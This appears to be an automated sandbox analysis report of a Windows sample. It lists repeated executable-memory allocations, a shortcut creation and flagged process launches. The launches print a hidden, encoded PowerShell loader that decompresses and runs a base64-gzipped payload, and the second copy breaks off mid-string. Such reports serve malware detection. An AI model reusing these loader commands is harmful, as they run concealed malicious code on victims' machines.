NtProtectVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02921000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02922000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02923000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASQBzAHkAMQAyAFUAQwBBADcAVgBXAGIAVwB7ADIAfQBpAE8AQgBEACsAdgB0AEwAKwBoADIAaQBGAGwARQBTACcAJwArACcAJwBsAEoATAB5AG8AdQA2ADIAMAAwAGoAbABRAG0AaQBCAEMAMgBZAFoAQwBLAFkAdABPAGIAdQBLAEEAaQB4AFAAVAB4AEMAbAB3AGUAewAyAH0AdgBmAGIAeAB5AFMAbAByADEAdAA3ADMAbwB7ADEAfQByAFMAVwBFAFkAOAArAE0AeAA4ADgAOABNACsATQB3AGkAMwAxAEIAZQBhAHkAcwB2AGkARABsADIAewAyAH0AdAAzAFMAagBHAEcATwBNAEcAUgBvAGwAWAA0AFEAMQBwAFYASwB7ADEAfQB4AFoANwA1ADMAcQB6ADcAdQBWAE0ASwBoAHsAMgB9AFYARAA0AHIAMgBnAHkAdAAxAHgAMABlAFkAUgByACcAJwArACcAJwBQAHoAOAA3AGEAVwBaAEsAUQBXAE8AeQB7ADIAfQBhAHgAZABFAG8ARABRAGwAMAAnACcAKwAnACcAUgAyAGoASgBOAFYAMAA1AFUAOQBsAHMAaQBRAEoATwBiADYAOAB1AHkAZQArACcAJwArACcAJwBVAEwANABwAGwAZAA5AHIARgA0AHoAZgBZAFYAYQBJADcAZAByAFkAWAB4AEwAbABHAE0AVwBCADMATwB0AHoASAAwAHYAUABhAHQANgBhAFUAYQBHAHAAWAA3ACsAcQArAHUAeQA0AFAAcQArAGQAUAAyAFMAWQBwAFoAcgBxADcAVgBKAEIAbwBsAHIAQQBtAEsAbwByADMAMwBWADUANABHAGkAMwBKAHAAcgBxAFUAagB7ADIAfQBoAEsAUQA5AEYAYgBVAEwAagBaAHEATgAyAEgAYQBjADQASgBBAE8AdwA5AGsAaABjAEkAcABZADgAUwBGAFcANAB6AFAATgAxAEUAaQBLAHkASgBOADcAZgBTAHAAcgBaAEMAMgBrAHEAVABJAGMASgA5ADEARQBRAEoAQwBSAE4AMQBhAG8AeQBrAHcAZgBNADUAdgBQAGYAdABGAGwAeAArAGwAVQBXAEMAeABxAFIAbQBoAE0ATABrAHYAQwAxAFIANQBKAEgANgBwAE8AMABaAHUATQA0AFkATwBTAEsAaABIAFAAUQA4ACcAJwArACcAJwBrAFIAQwA0ADgAVgBjADEAMABIAHMAawBhACsAJwAnACsAJwAnAEkAVgBvAGsAegB4AHEAcgBLAGYAegBHAGoARABjAGkAbQB4AE8ANgB0AFMAdABxAGgARQBrAGcATgBSAGEASgBYAEkAYQBnAHYAMwBOAFAAbABRAGMAYgBJAFgAbABOADkAdwBWAEYASgBCAEIAMwBHAEUAeABrAEEAdwBPADgAUwB3ADcAQQBrAEUASABVADYARgB5ADgAdwA2AEgAbQBoAEgAJwAnACsAJwAnAEwATgA4AGgANABEAFAAMgBwAEMAewAxAH0ATgBGACcAJwArACcAJwBmACsAcgBKAGgAVgB4AFkAWABUAHMAZQBEAEoARABqADQAcgBvAHkAUQBqACsAdgB3AEoAYwBhAFcAUwByAHUAdgBkADYAJwAnACsAJwAnAGwAdQB0ADEAVQB0AFYAVQBHAFEATQBGAG0AWgBqAFQAbwBQADUAcwB7ADIAfQBvAFAAOABhADgAOABiAGkAOABkAEsAZgBRADYAbQB6AHMAawBwAEQASABwADcARwBJAGMAVQBiADgAawByAFAAWgBTAFUARQBqAEkAUwBJADUASQByAFIAUQBiAGcASAArAGEAVwBtAHkAUQBvAEUATQAnACcAKwAnACcAWQBXAFcAQQBoAFkAWgBiAGMAKwBFAHsAMQB9AHQAUABLAEwAaQBTAGQAZgBLAEsAQQB0AEkAZwB7ADEAfQB3AEkAYgBBAHAAZQBRAGMAegAxAEgANQAzAFoAUgAwADUAVAB7ADEAfQBkAGcAbABFAFkAQwAzAHsAMgB9AHcAYQB5AFYAawBKAEkARQAxAEoASwBGADYAbQB4AEsAMAArAFgAMwB5AEMAawB0AGgAbABPAEkAYwBXAEgARwBlAFMAcABYADEAVQA4AGcAaABrAEoAcQBnAHEAJwAnACsAJwAnAEsAVQAxAHAAcwBvAFUAegB3AGYASwBvACsAdQArAHQAbQBUAEYAJwAnACsAJwAnAEEAZgBwADYASQAwAE4AOQBmAHsAMgB9AEIAbQBkAHgAYgBKAHYASABxAFUAZwB5AEgAOABJAEsARQBJAHkAOABOAGYARQBwAFoAaABLAFIAcQBtAEwAVABnAEYAZwA3AGoAeQA3AEsANAA5AFUAWAA4AFcAaABqAHgAaQBCADkAdwBOAEkAagB4AEEATgBXAEoAQQA2AGUAawBHAFIASgB3AE4ATwBjAEcASAByAE4ASQA4AEsASgAxAG8AeABFAEkASgBQAFgAagBTADcARABDADYAZwBTAFIAWgBMAGsANwBNAEkATABFAHEAaQB2AE8ARgByAG0AdwBwADcANABFAHAAawBTAGsAZwBNADMASQBkAHcAZQA0ADYASwBxAGoARwBrAGkAbwBBAHAASgBsAEcAVgArAHsAMgB9AEEAOABmAGYAcQA0ACsAdQBUAFAAdABoAEIAVABCADAAYwBvAE0AbQAxAGsANwBJAFYATwBnAGcAdQAyADYASgBHAG0AQgBVAEkANQBIAEkAZwBDAEwAYgBzAEkAagBDADYAZgBrAHAATABVAHYATgBOAG8ASAA0ADUASQBPAEUAWQB5AHAARQB6AE0AMwA2AEsAMQBvADMAZAB7ADEAfQBBAHoANABYAGYAdABSAHMAZQA5AFgAMgA2AEcAQQBxAFQAUgA2ADcAZgBUAG8AYwBYADMAVQArAEkAYgBoAFkAYgB7ADIAfQA5AE0AQQArAFUARQB2AEkASwBmAGUAdQBDAFcAOABjADAAZQAwAGgAOABqACsAUQBrADIAcgB0AGYAUQB0AGMAdwBUAHoAYQAwAGMANABGADQANgBZAE8AcwBnAGUATABYADEAbQBEAGoAdQAyADQAVQAxAFQAawAyADcAcwBpAGUAdAAzAHIARAA4ADIAagBSAFMAbwAyAG0AcgBaAE4AeQBaAHEATgBsAHUAWABUAFgATQBGADQARQAxAHAAZgBiAEYAQwB3AFMAQwBpAG0AMgAwAGYANQBsAEIAUgBMAHsAMgB9AHUAVwBrADEAcQBtAHcAOAA1ADcANwBhAHUANwBTAGEATgA3AE8AMgBHADIAMABlAG8AdQB3AHcAbABQAHYAWgBOAHAAeAB6AEMATQAwAHcAQgAzADMAQgAxAEMARgBnACsAYQA3AHUANgBtAGYAcwBWAEgAdABoADkAWgBoAGoASABPAGUAcwBpAEMANgA2ADIAMwAzAGEAcwB2AHUAQgAwAGgAdgBPAGsAWQA5AFEAewAxAH0AdgBUADgAWQAnACcAKwAnACcAZABhAGsAeQA0AGgAUgBjADkAZgByAEkAdwAnACcAKwAnACcAdwB0AGIAUQBHAEwAUABHAG8AbwAxADYAVwA0AHUAUwAyADQAZgB6ADcAdQAwAE4AZAB2AHQAMwBnADAAWgBvADEASwBjADMAcQBOAE0AYQBUAHkAVgBPADQAdwBaAHQAewAxAH0AbwB6AHUANABjAGoAeABEAGIAWgBIADYAZQBXAFIAYgBkAFQASABCAE8AYgBqAGIARABTAHgAcABXADIARQBGADEAZQBUAE0AZABoAHEAKwBNAHYAUQBPAEoAMQAwAGoAcABCADEAMQBKACsAbQBEAGIAeQB5AGUATwA1AE4AOQB7ADIAfQBZAEIAWABTAHkAewAxAH0ANgArADYAUQB3AGYANwBvAHUAcwBIAFIAbQBBADEAdQBNAE8AcgBmADcAcgBvAEcAewAxAH0ARABkAHMASQBiAHQAbABJADkAOQBkAGIAKwBPAGIAOQBlAGIAagA0ADAAYgBnADMAZwBRAHYAcgBKACcAJwArACcAJwBGAHgAZQB2ADMANQBBADgAUgA3AGQAawAxAGoAMABXAHoATQBLADkASAAyAGQAaQB5AEwANAB2AHQAMwBGAFcAYQB0AEgAZwA3AEMAewAyAH0AbAByAFIAZAAzAEcAUwBMAGoARQBEAE8AawBBADEATAA3AE8AeQB5ADUATgB1AFUAWgArAEgAewAxAH0ARQBvAE4AVABaAE8ATgBmAGsAVwBTAG0ARABCAG8AagBkAEEAOABTAHkANABqAHgAcgBnAHYAMgAwAE4AJwAnACsAJwAnAGUAeQBLAEUAMQA3AFIAdQBHADcARgB7ADIAfQBYAFQAdQA3AFYAUwB6AE4AZAAnACcAKwAnACcAZQBSAEwAVQB7ADEAfQA5AHQARwB1AFgAUgAyAGQAZwB0AE8AUQB7ADEAfQA0AEEAZABXAHQAOQBFAGkAewAyAH0ARQBzAG0AcAB1AG0ANgBZAEoAMQBkADcAYwBtAHEAMAA4AEQAOQA1ACsAcwB6AFoAZgA3AHoAUgBwAHEAeQByAGIAUgBZADUATQBZAFoAdgBsAHQAcwBFAGMARABSAFYATgArACsAJwAnACsAJwAnAFYAWQB3AGEAdABBAFEASABWADYASABhADMAWABnAEkATwBqAFYAMQBCAE0AbwBMAHIAdABVADEAegBDAFoAMwBIAE8ARABzAEUAcgA3AHYAWABFAGgAUQBQAHMAQQBMAFEANgAzAEgAdwBtAEgAdwBRADUAUgA4AEQAQQBNAFgAbABRAEsAawBKADIAeQA4AFAAdQBXADIASAAzADUANwArAFUATgBVAFcAaABXAHMASgBmADgARwArAHMAZQBWADcANwBoADkAMAAzAE0AYwBtAHMANwB0AEgANQBhAGYAewAxAH0ASABoAFkATQBhAHsAMgB9ACsAcwBRAG0ARwBBAHEAUQBOAEMARABpAHMAdgBJAHsAJwAnACsAJwAnADIAfQBoAEgAdwBNAGgAQgBGAHAAaAB4AEcAKwBQADQAYwA4AGkAQQBzAGgAewAxAH0AdwBiAFgAMgBiAGkAZQBBAEIAdgByAGIAegBtAHsAMgB9AHcAWABSAEEAOABhAEUAbABRAHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBuACcAJwAsACcAJwAvACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
cmdline	"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAIsy12UCA7VWbW{2}iOBD+vtL+h2iFlES'+'lJLyou6200jlQmiBC2YZCKYtObuKAixPTxClwe{2}vfbxySlr1t73o{1}rSWEY8+Mx888M+Mwi31BeaysviDl2{2}t3SjGGOMGRolX4Q1pVK{1}xZ753qz7uVMKh{2}VD4r2gyt1x0eYRr'+'Pz87aWZKQWOy{2}axdEoDQl0'+'R2jJNV05U9lsiQJOb68uye+'+'UL4pld9rF4zfYVaI7drYXxLlGMWB3OtzH0vPat6aUaGpX7+q+uy4Pq+dP2SYpZrq7VJBolrAmKor33V54Gi3JprqUj{2}hKQ9FbULjZqN2Hac4JAOw9khcIpY8SFW4zPN1EiKyJN7fSprZC2kqTIcJ91EQJCRN1aoykwfM5vPftFlx+lUWCxqRmhMLkvC1R5JH6pO0ZuM4YOSKhHPQ8'+'kRC48Vc10Hska+'+'IVokzxqrKfzGjDcimxO6tStqhEkgNRaJXIagv3NPlQcbIXlN9wVFJBB3GExkAwO8Sw7AkEHU6Fy8w6HmhH'+'LN8h4DP2pC{1}NF'+'f+rJhVxYXTseDJDj4royQj+vwJcaWSruvd6'+'lut1UtVUGQMFmZjToP5s{2}oP8a88bi8dKfQ6mzskpDHp7GIcUb8krPZSUEjISI5IrRQbgH+aWmyQoEM'+'YWWAhYZbc+E{1}tPKLiSdfKKAtIg{1}wIbApeQcz1H53ZR05T{1}dglEYC3{2}wayVkJIE1JKF6mxK0+X3yCkthlOIcWHGeSpX1U8ghkJqgq'+'KU1psoUzwfKo+u+tmTF'+'Afp6I0N9f{2}BmdxbJvHqUgyH8IKEIy8NfEpZhKRqmLTgFg7jy7K49UX8WhjxiB9wNIjxANWJA6ekGRJwNOcGHrNI8KJ1oxEIJPXjS7DC6gSRZLk7MILEqivOFrmwp74EpkSkgM3Idwe46KqjGkioApJlGV+{2}A8ffq4+uTPthBTB0coMm1k7IVOggu26JGmBUI5HIgCLbsIjC6fkpLUvNNoH45IOEYypEzM36K1o3d{1}Az4XftRse9X26GAqTR67fTocX3U+IbhYb{2}9MA+UEvIKfeuCW8c0e0h8j+Qk2rtfQtcwTza0c4F46YOsgeLX1mDju24U1Tk27siet3rD82jRSo2mrZNyZqNluXTXMF4E1pfbFCwSCim20f5lBRL{2}uWk1qmw8577au7SaN7O2G20eouwwlPvZNpxz